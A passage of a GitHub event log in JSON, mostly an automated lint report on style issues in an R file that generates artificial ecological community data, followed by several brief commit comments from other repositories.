T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:82:1:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L82) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n[R/generateArtificialData.R:83:16:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n              ~^~~\n```\n[R/generateArtificialData.R:83:32:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n                              ~^~\n```\n[R/generateArtificialData.R:83:61:](https://github.com/thijsjanzen/STEPCAM/blob/aa27e482b4b0cf7a5e5463b02ff5201ae581eb0a/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n                                                           ~^~\n```\n"}},"created_at":"2016-09-19T18:15:02Z"}
{"id":"4584977314","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"SerhiiZiatko/2_js_tasks"},"payload":{"comment":{"id":19082786,"position":76,"line":76,"path":"main.js","commit_id":"dcdf6d2353a924c95e687e48a6d8d9a2a99e7678","created_at":"2016-09-19T18:15:11Z","updated_at":"2016-09-19T18:15:11Z","body":"отличное решение - работа с массивами всегда быстрее чем со строками"}},"created_at":"2016-09-19T18:15:11Z"}
{"id":"4584977884","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19082788,"position":null,"line":null,"path":null,"commit_id":"0a18e95a5619e77f86867e6dfe94556664f4430e","created_at":"2016-09-19T18:15:15Z","updated_at":"2016-09-19T18:15:15Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.766.0a18e95a5619e77f86867e6dfe94556664f4430e](http://build.palaso.org/viewLog.html?buildId=76919&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:09"}},"created_at":"2016-09-19T18:15:15Z"}
{"id":"4584980947","type":"CommitCommentEvent","actor":{"login":"curiouscrusher"},"repo":{"name":"Gauge-Design/newproject"},"payload":{"comment":{"id":19082792,"position":null,"line":null,"path":null,"commit_id":"5c3a5c094d3a6c602c7578eae923ce46dec15567","created_at":"2016-09-19T18:15:50Z","updated_at":"2016-09-19T18:15:50Z","body":"This sucks, change all of it."}},"created_at":"2016-09-19T18:15:50Z"}
{"id":"4584981312","type":"CommitCommentEvent","actor":{"login":"dandv"},"repo":{"name":"component/textarea-caret-position"},"payload":{"comment":{"id":19082795,"position":8,"line":6,"path":"package.json","commit_id":"7a4e48e60595ec2ac2dad3bfc97ae7166ea0f321","created_at":"2016-09-19T18:15:54Z","updated_at":"2016-09-19T18:15:54Z","body":"How does this improve discoverability?"}},"created_at":"2016-09-19T18:15:54Z"}
{"id":"4584982321","type":"CommitCommentEvent","actor":{"login":"Kotolegokot"},"repo":{"name":"Kotolegokot/IrrlichtTest4"},"payload":{"comment":{"id":19082797,"position":36,"line":71,"path":"IrrlichtTest4.cbp","commit_id":"9a03f31f3843d858a09bc213680e61888b3658ec","created_at":"2016-09-19T18:16:03Z","updated_at":"2016-09-19T18:16:03Z","body":"shit. that must be deleted"}},"created_at":"2016-09-19T18:16:03Z"}
{"id":"4584983719","type":"CommitCommentEvent","actor":{"login":"dimaShin"},"repo":{"name":"SerhiiZiatko/2_js_tasks"},"payload":{"comment":{"id":19082801,"position":111,"line":111,"path":"main.js","commit_id":"dcdf6d2353a924c95e687e48a6d8d9a2a99e7678","created_at":"2016-09-19T18:16:18Z","updated_at":"2016-09-19T18:16:18Z","body":"newSplice([1,2,3,4,5], 2) => 1,2 а должно с 2го элемента до конца"}},"created_at":"2016-09-19T18:16:18Z"}
{"id":"4584984331","type":"CommitCommentEvent","actor":{"login":"curiouscrusher"},"repo":{"name":"Gauge-Design/newproject"},"payload":{"comment":{"id":19082803,"position":null,"line":null,"path":null,"commit_id":"5c3a5c094d3a6c602c7578eae923ce46dec15567","created_at":"2016-09-19T18:16:24Z","updated_at":"2016-09-19T18:16:24Z","body":"@robert-gauge make pretty"}},"created_at":"2016-09-19T18:16:24Z"}
{"id":"4584984712","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19082804,"position":null,"line":null,"path":null,"commit_id":"3130eb85258c6626113e464edc50d7d9aaee54fa","created_at":"2016-09-19T18:16:29Z","updated_at":"2016-09-19T18:16:29Z","body":"This is only reverting the work I did in the recent commit: https://github.com/cmangos/mangos-wotlk/commit/f5e8dae83f0498831c7bf3848af8393aa1b12dc5\r\n\r\nscripts should be unaffected (they may very well have been affected during the last 3 days that commit was in effect on master), but still we should get the flag sorted properly."}},"created_at":"2016-09-19T18:16:29Z"}
{"id":"4584984982","type":"CommitCommentEvent","actor":{"login":"curiouscrusher"},"repo":{"name":"Gauge-Design/newproject"},"payload":{"comment":{"id":19082807,"position":null,"line":null,"path":null,"commit_id":"5c3a5c094d3a6c602c7578eae923ce46dec15567","created_at":"2016-09-19T18:16:31Z","updated_at":"2016-09-19T18:16:31Z","body":"@elizabethjpryor make more better"}},"created_at":"2016-09-19T18:16:31Z"}
